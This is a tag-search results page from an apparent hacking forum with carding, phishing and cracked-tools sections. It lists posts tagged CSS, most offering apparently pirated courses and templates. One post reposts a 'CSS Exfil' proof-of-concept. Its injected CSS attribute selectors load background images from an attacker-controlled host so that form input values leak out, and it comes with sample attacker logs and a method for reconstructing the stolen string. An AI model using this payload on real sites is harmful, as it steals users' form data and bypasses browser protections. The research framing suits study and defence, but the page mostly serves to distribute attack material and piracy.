Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Search the Community

Showing results for tags 'css'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Product Groups

  • PRIV8
  • Advertising
  • Access Basic
  • Seller
  • Services

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 8 results

  1. Complete Guide to CSS Flex & Grid - Vanilla CSS Become a Pro at building components & layouts with CSS Flexbox and Grid. Learn by looking at a curated list of 70+ real world use cases and examples. Gain access to Private CodePen links with working demos for all examples. Why this book? Most of the tutorials on the web teach the concepts of CSS Flexbox and Grid using some coloured blocks. You get introduced to all the CSS properties related to these concepts and how they work. But very rarely you get to see some examples of where and how these are used in the real world. Without understanding the real world application, learning is incomplete. This book takes a completely different approach. I won't teach you the things flex and grid can do. Instead, I will first show you some components and layouts and make you think how to build them using the CSS concepts you already know. Now you have a problem, and you want a solution. That's when I introduce the concepts you "need" to know. This is called Problem-Based Learning which will not only keep you motivated throughout the book, but also help you retain the knowledge far better. Who is this book for? Whether you are a beginner at CSS who's never heard of flex and grid, or someone who knows all the concepts but finding it hard to implement in real projects, or anywhere in between, this book is for you. Even if you're here to just look at some examples and practise your skills, you will find a great collection here. [hide][Hidden Content]]
  2. Mosaic is a powerful admin dashboard template built with Tailwind CSS. It features hundreds of pre-built layouts and sections and is coded in HTML, React, and Vue. Mosaic comes with dozens of functional designs to help you get started quickly. With a wide range of beautiful styles and a full-screen layout, it’s a perfect fit for admin dashboards, eCommerce, marketplaces, FinTech, and SaaS companies to use as a starting point for their projects. If you are looking to take your app to the next level – Mosaic is the way to go! What’s inside 50 Pre-assembled pages (available in HTML, React and Vue) 80+ Ready-made demo sections 14 Atomic Components (buttons, forms, modals, tooltip, pagination, and more) 18 Beautiful Charts (line, bars, stacked bars, doughnut, polar) 7 Table layouts 6 E-Commerce layouts (shop, product, cart, checkout) Blog feed + Blog post Authentication pages Utility sections (changelog, roadmap, pricing plans, and more) 4 Steps onboarding process Kanban Board Full-page Calendar Inbox app layout Chat app layout Page not found (404) … and more! Features Fully Responsive layouts Retina-ready Focus on accessibility for keyboard navigation + WAI-ARIA Clean code with comments W3C validation passed Google Fonts integration Beautiful SVG icons Third-party libraries integration (Chart.js, Flatpickr) Design files included (for Sketch and Figma) Last Update 2 December 21 Download: [Hidden Content]
  3. Introducing CSS Exfil Several months ago I began tinkering with Chrome's XSS auditor looking for bypasses. One remote injection method which reliably got through Chrome's filter was CSS injection. By utilizing injected CSS, an attacker essentially has complete control over the look-and-feel of a page. I also discovered an attacker can leverage CSS to steal form data. By utilizing CSS alone, browser protections like NoScript can't block the egress of data (although NoScript's XSS auditor is more effective than Chrome at blocking some of the injection Proof of Concept attacks detailed below). While CSS injection is not a new vulnerability, using CSS as the sole attack vector to reliably exfiltrate data - to my knowledge - has never been presented. I am also not aware of any effective method previously documented to guard end users against such attack - other than to block CSS, which is not a practical solution. Related Work The only mention I could find of a similar egress method, is [Hidden Content], which demonstrates how CSS can be used to beacon an attacker when certain data is present on a web page. (Admittedly, I found this page later when researching possible mitigation techniques.) A couple weeks ago I also became aware of a GitHub project dubbed [Hidden Content], which uses CSS to track web users. Methods of Exploitation There are a variety of attack scenarios which can leverage CSS Exfil, including: Reflected or stored code injection flaws (e.g. any page vulnerable to XSS) Hijacked or malicious 3rd party resources intentionally or accidentally included within the DOM (Document Object Model) of the target element. e.g.: Web tracker snippits Remarketing code Advertisements which are not not encapsulated within an iframe Web development plugins/libraries/frameworks Malicious or hijacked browser extensions Anatomy of the Attack The CSS Exfil attack centers around the CSS 'value selectors', which can be used to parse HTML tag attribute data. Here is a summary of these selectors: [attribute=value] [foo=bar] Selects all elements with foo="bar" [attribute~=value] [foo~=bar] Selects all elements with a foo attribute containing the word "bar" [attribute|=value] [foo|=bar] Selects all elements with a foo attribute value starting with "bar" [attribute^=value] [foo^="bar"] Selects all elements with a foo attribute value starting with "bar" [attribute$=value] [foo$="bar"] Selects all elements with a foo attribute value ending with "bar" [attribute*=value] [foo*="bar"] Selects all elements with a foo attribute which contains the substring "bar" This simple example demonstrates how these selectors can be abused: <style> #username[value="mikeg"] { background:url("[Hidden Content]"); } </style> <input id="username" value="mikeg" /> In the above example, when the HTML/CSS is rendered in a web browser, a background image is loaded on a remote host controlled by the attacker, indicating the value of the input is 'mikeg'. To make the attack more useful, additional text parsing is required. Below are several proof of concept exploits demonstrating the variety, scope, and severity of potential attacks. Proof of Concept Basic CSS Exfil example which shows how malicious CSS/HTML can be used to leak page data. <html> <head> <style> #username[value*="aa"]~#aa{background:url("[Hidden Content]");}#username[value*="ab"]~#ab{background:url("[Hidden Content]");}#username[value*="ac"]~#ac{background:url("[Hidden Content]");}#username[value^="a"]~#a_{background:url("[Hidden Content]_");}#username[value$="a"]~#_a{background:url("[Hidden Content]");}#username[value*="ba"]~#ba{background:url("[Hidden Content]");}#username[value*="bb"]~#bb{background:url("[Hidden Content]");}#username[value*="bc"]~#bc{background:url("[Hidden Content]");}#username[value^="b"]~#b_{background:url("[Hidden Content]_");}#username[value$="b"]~#_b{background:url("[Hidden Content]");}#username[value*="ca"]~#ca{background:url("[Hidden Content]");}#username[value*="cb"]~#cb{background:url("[Hidden Content]");}#username[value*="cc"]~#cc{background:url("[Hidden Content]");}#username[value^="c"]~#c_{background:url("[Hidden Content]_");}#username[value$="c"]~#_c{background:url("[Hidden Content]");} </style> </head> <body> <form> Username: <input type="text" id="username" name="username" value="<?php echo $_GET['username']; ?>" /> <input id="form_submit" type="submit" value="submit"/> <a id="aa"><a id="ab"><a id="ac"><a id="a_"><a id="_a"><a id="ba"><a id="bb"><a id="bc"><a id="b_"><a id="_b"><a id="ca"><a id="cb"><a id="cc"><a id="c_"><a id="_c"> </form> </body> </html> The above example isn't all that realistic but it demonstrates the fundamentals of the CSS Exfil attack. When a user enters any string consisting of the letters 'a' 'b 'c', specific elements will be styled with a non-existent background image at a remote attacker URL. For the attack to succeed three conditions need to be in place: Upon visiting hxxps://victim[.]host/css-exfil-poc1[.]php?username=abcab, the attacker will receive data like this. 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ab HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /a_ HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /bc HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /_b HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ca HTTP/1.1" 404 22 Which can be re-assembled like this: a # a_ ab # ab abc # bc abca # ca abcab # _b The malicious CSS utilizes pattern matching for two character combinations ('aa', 'ab', 'ac'...) as well as detection of the first and last letter of the string ('a_' & '_a' callbacks). This method provides a reliable method of reconstructing data. The limitation is that repeating patterns may not always be apparent and reconstruction may sometimes require human intelligence if the data decodes to multiple strings. Why not use three character matching or longer? In a word: practicality. If the structure of the data can be anticipated it may be possible to use longer strings, which I will illustrate below. The more targeted the attack the more it becomes possible to make better data predictions and reduce the CSS footprint. But in general, the two-character first/last-character approach provides the best performance to attack footprint. All two letter English alphabet lower case alphabet permutations work out to P(26,2) = 650. Three character permutations increases the footprint to P(26,3) = 15,600, making it much more unlikely that Condition #2 will be possible. This table describes the attributes of various attack alphabet. Alphabet Regex Calculation Required Elements Estimated CSS Payload Numeric [0-9] P(10,2) + (10 * 2) 110 7.7 KB Lowercase [a-z] P(26,2) + (26 * 2) 702 49.14 KB Lower/uppercase [A-Za-z] P(52,2) + (52 * 2) 2,756 192.92 KB Lower/uppercase / Numeric [A-Za-z0-9] P(62,2) + (62 * 2) 3,906 273.42 KB Lower/uppercase / Numeric / 32 symbols P(94,2) + (92 * 2) 8,926 624.82 KB Depending where the targeted data element resides within a page, large alphabets may be possible without HTML injection. Running document.getElementsByTagName('*').length; in your browser console will display the total number of DOM (Document Object Model) elements on a page, which can provide an upper bound. For example, my homepage (at the time of this writing) has ~750 DOM elements in total. A test of Slashdot yielded ~2,100 elements and Google News yielded ~6,900 elements! That's not to say that each DOM element can be properly referenced by the target element, but it gives an upper bound on what may be possible without additional DOM injection. Condition #1: The data being parsed must be present on page load Condition #2: There must be one or more elements which can be referenced via a CSS selector relative to the data element Condition #3: The element must be styled with a CSS property which takes a URL (e.g. background / background-image, list-style / list-style-image, or cursor). More info && Download [Hidden Content]
  4. Download 250+ HTML & CSS Examples code used in this Course ...... Build 15+ Websites in this Course ...... Learn HTML & CSS 10X times faster with Examples, Exercises, Projects and Quiz ...... Complete Hands-on and Practical approach on building website ...... >>>>>>>>> How this Course can Help? <<<<<<<<<<<<<< Will this course help me to learn HTML & CSS in the right way? Every sections from Starting to Last is carefully organised into these categories: Objective Lectures Complete Materials Download Access to Premium Documentation Library Live Preview of HTML & CSS Code Projects for every Section. Exercises on each of the topics Downloads Articles Assignments Quiz Summary With lots of time spent in organising these topics and making sure you get to learn HTML & CSS faster and with tons of supporting source code and proper guidance. >>>>>>>>> Website you will build in this course <<<<<<<<<<<<<< HTML & CSS Projects that you will learn to build with this course: Personal Resume. NewsPaper (Articles from huffpost). Music Download Website. Contact Form. HTML Tutorials Website. Draw and Move Boxes Around. Design Website Layout Header. Navigation. Content. Left Side Bar. Right Side Bar. Footer. HTML Layout. Personal One Page Website. Product Landing Page. Survey Page. Google Home Page. Coming Soon Page. many exercises for practise >>>>>>>>> Get Access to our Premium Documentation Library <<<<<<<<<<<<<< Entire course and plus more topics are documented at our Library: WEB BASICS HTML CSS JAVASCRIPT PHP MYSQL WORDPRESS INTERVIEW QUESTIONS PROJECTS SAMPLE DOWNLOAD PROJECTS >>>>>>>>>>>>>>> Learning Experience <<<<<<<<<<<<<<<<<<<<< What will I do in this Course? You will have fun building Website! Trust me. You will start with starting point source code and ending source code so that you know where you will start and end. You will be: Learning how to build website with Examples. Then do Exercise on the same topic by your own. (We provide solution as well) After that take the Quiz. Finally some reference blogs for continuing your study offline. With proper source code materials, you are never lost. Sections have a proper outcome before we start. So, know what you will learn after the section. 100% Guaranteed PHP Learning Experience ...... We have already trained so many students to learn building Websites and based on the feedback we know our materials are useful and easy to learn. 8.5+ hours of Course Materials. Defined Outcome with Objective and Summary. Access to Premium Documentation Library so that you can refer back. Assignment and Quiz so can test yourself. HD Quality and Clear Voice. (Needless to say but anyway...) Forum Support. many others once you get to know about us. >>>>>>>>>>>>>>> Topics you will learn <<<<<<<<<<<<<<<<<<<<< This course will help you learn ...... What is Protocol? What is Internet? What is TCP/IP Protocol? What is DNS? What is HTTP? What is Client Server Technology? How Website Works? Types of Languages. Compiler vs Interpreter. What is HTML? Tag, Element and Attribute. Structure of HTML Page. First HTML Page. HTML Boilerplate. Headings, Paragraph, Comments, Lines and Breaks. Text Formatting Tags. Pre and Code Tags Lists. Section and Articles. Projects: Personal Resume. Newspaper. (huffpost) Creating Tables. Embedding Contents – Image, Video and Audio. Working with Forms. Meta Tags. DIV and SPAN. Whitespaces, HTML Entities and Case Sensitive. iFrames. Projects: Music Download Website. Contact Form. HTML Tutorials Website. What is CSS3? Inline CSS. Comments in CSS. Internal, External and Linking of CSS. Debug CSS. 12 Types of CSS Selectors. Pseudo Class and Elements. CSS Precedence Rules. Color and Text. CSS Exercises. CSS BOX. CSS Floating Columns. Float or Clear. Positioning of Box. Display Inline or Block. Use Google Fonts. Link Favicon. Project: Moving Boxes. Design Website Layout. Simple HTML Page Layout. Your Personal Website. Product Landing Page. Survey Page. Google Home Page. Coming Soon Page. and many more topics ...... Trust me you will learn more than what we have shown here. Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  5. WordPress CSS and JavaScript Toolbox plugin version 8.4.1 suffers from a database disclosure vulnerability. View the full article
  6. Tailwind CSS v0.5.2 A Utility-First CSS Framework for Rapid UI Development [Hidden Content]
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.